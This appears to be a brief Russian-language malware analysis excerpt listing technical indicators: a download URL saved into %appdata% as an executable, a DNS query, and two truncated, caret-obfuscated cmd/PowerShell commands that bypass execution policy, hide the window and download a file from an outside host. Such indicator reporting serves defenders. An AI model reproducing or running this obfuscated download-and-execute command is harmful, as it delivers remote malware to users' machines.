Техническая информация
- http://roggistazli.top/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "pO^W^er^s^hel^L.^Exe ^-ExE^cutioNpol^icy ^B^yPa^Ss -NoPrOfI^le -WINDO^WST^Y^le ^HId^DEn ^(^NEW^-Ob^j^ECT System.^n^eT.^wEbcLIEnt^)^.DowNLoaDFI^l^e('http://roggistazli.top/search...
- DNS ASK ro###stazli.top
- '<SYSTEM32>\cmd.exe' /c "pO^W^er^s^hel^L.^Exe ^-ExE^cutioNpol^icy ^B^yPa^Ss -NoPrOfI^le -WINDO^WST^Y^le ^HId^DEn ^(^NEW^-Ob^j^ECT System.^n^eT.^wEbcLIEnt^)^.DowNLoaDFI^l^e('http://roggistazli.top/search...' (со скрытым окном)